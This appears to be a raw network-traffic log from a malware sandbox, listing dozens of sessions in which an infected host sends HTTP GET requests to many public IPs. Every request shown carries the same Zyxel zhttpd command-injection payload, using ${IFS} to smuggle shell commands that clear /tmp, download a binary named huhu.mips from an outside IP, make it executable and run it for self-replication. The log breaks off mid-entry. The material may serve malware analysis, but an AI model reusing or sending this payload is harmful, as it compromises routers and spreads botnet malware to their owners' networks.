                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021943092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5645192.168.2.1444488105.104.167.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.021971941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5646192.168.2.1445288209.226.187.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022008896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5647192.168.2.144130234.123.33.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022051096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5648192.168.2.1454050179.63.167.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022089005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5649192.168.2.1436930139.128.9.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022119999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5650192.168.2.1447250107.188.248.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022151947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5651192.168.2.1444226105.155.224.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022186995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5652192.168.2.1435766182.5.125.197443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022241116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5653192.168.2.1451036142.255.88.32443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022277117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5654192.168.2.145413092.253.71.58443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022310019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5655192.168.2.143777495.3.199.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022356033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5656192.168.2.1434220196.242.39.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022387028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5657192.168.2.143295835.234.60.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022443056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5658192.168.2.1450788176.11.99.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022464037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5659192.168.2.14475602.90.216.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022527933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5660192.168.2.1450536194.18.88.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022553921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5661192.168.2.1435236110.152.165.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022573948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5662192.168.2.145642241.54.216.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022624016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5663192.168.2.1443680141.104.180.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022649050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5664192.168.2.1460574152.124.64.155443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022692919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5665192.168.2.144988435.38.227.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022730112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5666192.168.2.144741274.111.19.45443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022784948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5667192.168.2.1455956220.140.125.150443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022840023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5668192.168.2.1438750101.153.155.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022882938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5669192.168.2.144519458.117.100.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022901058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5670192.168.2.1451032157.205.128.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022938967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5671192.168.2.14600704.243.189.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.022964001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5672192.168.2.144226077.28.169.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023031950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5673192.168.2.1459116181.123.90.175443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023063898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5674192.168.2.1434254186.56.102.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023107052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5675192.168.2.1438730168.57.59.99443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023133039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5676192.168.2.1439026166.74.231.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023169041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5677192.168.2.14372262.251.37.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023222923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5678192.168.2.1451340204.57.128.134443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023252010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5679192.168.2.1453146101.244.237.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023298025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5680192.168.2.145202236.71.71.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023335934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5681192.168.2.1445012174.241.186.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023367882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5682192.168.2.1449812150.208.243.29443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023387909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5683192.168.2.1458704111.223.96.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023436069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5684192.168.2.1447332184.201.26.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023483038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5685192.168.2.144226894.22.234.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023534060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5686192.168.2.1439670151.132.144.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023540974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5687192.168.2.146006476.231.34.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023598909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5688192.168.2.1440202221.12.139.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023652077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5689192.168.2.1439040189.254.18.228443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023675919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5690192.168.2.143575017.199.206.20443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023725033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5691192.168.2.1455348181.119.41.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023758888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5692192.168.2.1457904134.145.66.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023801088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5693192.168.2.144709286.100.220.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023842096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5694192.168.2.1460302192.245.140.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023871899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5695192.168.2.1436564177.80.245.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023909092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5696192.168.2.1456072177.62.146.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023931980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5697192.168.2.1433372222.160.1.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.023972988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5698192.168.2.144635074.76.201.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024014950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5699192.168.2.1437196125.231.14.131443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024049044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5700192.168.2.145321027.18.152.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024101973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5701192.168.2.144219020.105.245.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024132967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5702192.168.2.1433344177.151.65.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024178982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5703192.168.2.14600309.119.203.114443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024235010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5704192.168.2.1450968169.26.185.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024265051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5705192.168.2.1447670115.212.13.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024296045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5706192.168.2.1454646167.58.251.77443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:15.024348021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5707192.168.2.1443052152.247.102.101443
                                                        TimestampBytes transferredDirectionData
